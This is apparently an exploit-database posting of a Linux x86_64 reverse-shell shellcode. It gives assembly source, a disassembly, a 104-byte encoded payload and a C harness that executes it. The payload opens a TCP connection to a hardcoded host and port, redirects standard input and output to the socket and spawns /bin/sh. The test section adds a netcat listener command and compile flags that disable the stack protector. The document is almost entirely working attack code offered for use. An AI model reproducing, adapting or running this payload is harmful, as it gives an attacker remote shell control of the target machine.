###########################

# GNU/Linux x86_64 Reverse Shell Shellcode

###########################

/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - Reverse Shell Shellcode
;Author: m4n3dw0lf
;Github: https://github.com/m4n3dw0lf
;Date: 18/07/2017
;Architecture: Linux x86_64
;Tested on: #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux
 
##########
# Source #
##########
 
section .text
  global _start
    _start:
        push rbp
        mov rbp,rsp
        xor rdx, rdx
        push 1
        pop rsi
        push 2
        pop rdi
        push 41
        pop rax ; sys_socket
        syscall
        sub rsp, 8
        mov dword [rsp], 0x5c110002 ; Port 4444, 4Bytes: 0xPORT + Fill with '0's + 2
        mov dword [rsp+4], 0x801a8c0 ; IP Address 192.168.1.8, 4Bytes: 0xIPAddress (Little Endiannes)
        lea rsi, [rsp]
        add rsp, 8
        pop rbx
        xor rbx, rbx
        push 16
        pop rdx
        push 3
        pop rdi
        push 42
        pop rax; sys_connect
        syscall
        xor rsi, rsi
    shell_loop:
        mov al, 33
        syscall
        inc rsi
        cmp rsi, 2
        jle shell_loop
        xor rax, rax
        xor rsi, rsi
        mov rdi, 0x68732f6e69622f2f
        push rsi
        push rdi
        mov rdi, rsp
        xor rdx, rdx
        mov al, 59
        syscall
 
#################################
# Compile and execute with NASM #
#################################
 
nasm -f elf64 reverse_tcp_shell.s -o reverse_tcp_shell.o
ld reverse_tcp_shell.o -o reverse_tcp_shell
 
#########################
# objdump --disassemble #
#########################
 
reverse_tcp_shell:     file format elf64-x86-64
 
 
Disassembly of section .text:
 
0000000000400080 <_start>:
  400080:   55                      push   %rbp
  400081:   48 89 e5                mov    %rsp,%rbp
  400084:   48 31 d2                xor    %rdx,%rdx
  400087:   6a 01                   pushq  $0x1
  400089:   5e                      pop    %rsi
  40008a:   6a 02                   pushq  $0x2
  40008c:   5f                      pop    %rdi
  40008d:   6a 29                   pushq  $0x29
  40008f:   58                      pop    %rax
  400090:   0f 05                   syscall 
  400092:   48 83 ec 08             sub    $0x8,%rsp
  400096:   c7 04 24 02 00 11 5c    movl   $0x5c110002,(%rsp)
  40009d:   c7 44 24 04 c0 a8 01    movl   $0x801a8c0,0x4(%rsp)
  4000a4:   08 
  4000a5:   48 8d 34 24             lea    (%rsp),%rsi
  4000a9:   48 83 c4 08             add    $0x8,%rsp
  4000ad:   5b                      pop    %rbx
  4000ae:   48 31 db                xor    %rbx,%rbx
  4000b1:   6a 10                   pushq  $0x10
  4000b3:   5a                      pop    %rdx
  4000b4:   6a 03                   pushq  $0x3
  4000b6:   5f                      pop    %rdi
  4000b7:   6a 2a                   pushq  $0x2a
  4000b9:   58                      pop    %rax
  4000ba:   0f 05                   syscall 
  4000bc:   48 31 f6                xor    %rsi,%rsi
 
00000000004000bf <shell_loop>:
  4000bf:   b0 21                   mov    $0x21,%al
  4000c1:   0f 05                   syscall 
  4000c3:   48 ff c6                inc    %rsi
  4000c6:   48 83 fe 02             cmp    $0x2,%rsi
  4000ca:   7e f3                   jle    4000bf <shell_loop>
  4000cc:   48 31 c0                xor    %rax,%rax
  4000cf:   48 31 f6                xor    %rsi,%rsi
  4000d2:   48 bf 2f 2f 62 69 6e    movabs $0x68732f6e69622f2f,%rdi
  4000d9:   2f 73 68 
  4000dc:   56                      push   %rsi
  4000dd:   57                      push   %rdi
  4000de:   48 89 e7                mov    %rsp,%rdi
  4000e1:   48 31 d2                xor    %rdx,%rdx
  4000e4:   b0 3b                   mov    $0x3b,%al
  4000e6:   0f 05                   syscall 
 
 
#######################
# 104 Bytes Shellcode #
#######################
 
for i in `objdump -d reverse_tcp_shell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done
 
\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05
 
########
# Test #
########
 
In the asm source:
  mov dword [rsp+4], 0x801a8c0 <IP Address (Little Endian) of the host that will receive the shell>
 
In the host that will receive the shell run:
  nc -vvlp 4444
 
On the target machine:
   compile with:
     gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
   run:
     ./reverse_tcp_shell
 
 
 <!> gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
*/
 
#include <stdio.h>
 
unsigned char shellcode[] = "\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
main()
{
    int (*ret)() = (int(*)())shellcode;
    ret();
}

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-07-18]

###########################